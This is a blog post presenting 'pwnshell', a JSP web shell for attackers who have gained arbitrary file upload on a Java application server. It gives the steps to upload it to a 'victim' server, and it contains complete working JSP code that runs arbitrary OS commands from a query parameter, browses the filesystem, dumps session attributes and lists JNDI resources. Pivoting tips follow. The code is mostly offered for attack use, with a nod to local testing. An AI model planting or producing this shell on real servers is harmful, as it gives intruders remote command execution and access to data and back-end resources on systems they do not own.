If you’ve got an arbitrary file upload into a web-accessible directory of a J2EE application, you need something to make the most of that foothold. The world needs a JSP shell that really helps a blackbox attacker pivot to important assets, so I took a stab at it. It’s called, quite lamely, pwnshell. It’s a single JSP that, when browsed to, gives the user a Web 2.0 shell on the victimized server. Great for demos! The shell is here.

How do you use it?
1. Upload it to the victim server (try it on a local Tomcat server first!)
2. Browse to it
3. Pretend you’re looking at an xterm

Where does it work?
– Works cross-platform
– Works on Java 1.5+ (probably 1.4 too, but I haven’t tested it)

Why would you use it?
– Browse around the filesystem (as whatever OS account the servlet container runs under)
– Execute arbitrary system commands (it’s a shell, after all)
– Show and alter session attributes
– Dump JNDI entries
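To show what those four features boil down to inside a single JSP, here is a stripped-down, lab-only page written for this post. It is an added example, not pwnshell’s own code, and it assumes a local Tomcat and two hypothetical query parameters, `ls` (a directory to list) and `cmd` (a command to run); the JNDI dump assumes the container exposes the standard `java:comp/env` namespace. It deliberately has none of the UI, autocomplete or output escaping the real shell has.

```java
<%@ page import="java.io.*, java.util.*, java.net.URLEncoder, javax.naming.*" %>
<%
    // Added example for a local Tomcat lab, not pwnshell's code.
    // Hypothetical parameters: ?ls=<directory> and ?cmd=<command line>.
    String path = request.getParameter("ls");
    String cmd  = request.getParameter("cmd");
    out.println("<pre>");

    // 1. Browse the filesystem as the OS account the container runs under.
    //    Each directory entry is rendered as a link back to this page,
    //    which is what gives the "Explorer-like" feel.
    if (path != null) {
        File dir = new File(path);
        File[] entries = dir.listFiles();
        if (entries == null) {
            out.println("cannot list " + dir.getAbsolutePath());
        } else {
            for (File f : entries) {
                String label = f.getName() + (f.isDirectory() ? "/" : "");
                String href  = "?ls=" + URLEncoder.encode(f.getAbsolutePath(), "UTF-8");
                out.println("<a href=\"" + href + "\">" + label + "</a>");
            }
        }
    }

    // 2. Run an arbitrary command and stream stdout+stderr back to the browser.
    //    ProcessBuilder (Java 1.5+) is used instead of Runtime.exec so stderr
    //    can be merged into the same stream.
    if (cmd != null && cmd.trim().length() > 0) {
        try {
            ProcessBuilder pb = new ProcessBuilder(cmd.trim().split("\\s+"));
            pb.redirectErrorStream(true);
            Process p = pb.start();
            BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()));
            String line;
            while ((line = r.readLine()) != null) {
                out.println(line);
            }
            out.println("[exit " + p.waitFor() + "]");
        } catch (IOException e) {
            out.println("exec failed: " + e.getMessage());
        }
    }

    // 3. Dump the current HTTP session's attributes (the raw Enumeration is
    //    what Servlet 2.5 returns; newer containers type it as Enumeration<String>).
    out.println("--- session ---");
    Enumeration names = session.getAttributeNames();
    while (names.hasMoreElements()) {
        String n = (String) names.nextElement();
        out.println(n + " = " + session.getAttribute(n));
    }

    // 4. List what the application can see in JNDI under java:comp/env
    //    (DataSources, mail sessions, environment entries, etc.).
    out.println("--- jndi java:comp/env ---");
    try {
        Context ctx = new InitialContext();
        NamingEnumeration<NameClassPair> list = ctx.list("java:comp/env");
        while (list.hasMore()) {
            NameClassPair nc = list.next();
            out.println(nc.getName() + " : " + nc.getClassName());
        }
    } catch (NamingException e) {
        out.println("JNDI lookup failed: " + e.getMessage());
    }
    out.println("</pre>");
%>
```

Drop it into a webapp directory on a throwaway Tomcat and request `/shell.jsp?ls=/` or `/shell.jsp?cmd=netstat%20-an`. Note that the command runs with exactly the privileges of the container’s OS user and nothing more, which is why the first thing worth checking after landing a shell like this is who that user is and what the JNDI listing reveals about reachable back-end resources.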

Here are some screenshots of the shell in action. The first one shows simple directory browsing. Notice that all those directory entries are clickable links, which makes for a strange Explorer-like interface.

pwnshell - showing ls output

The next screenshot shows the help screen (type ‘help’) and the execution of a system command, ‘netstat’:

The last screenshot shows the shell’s autocomplete functionality.

Here’s a video: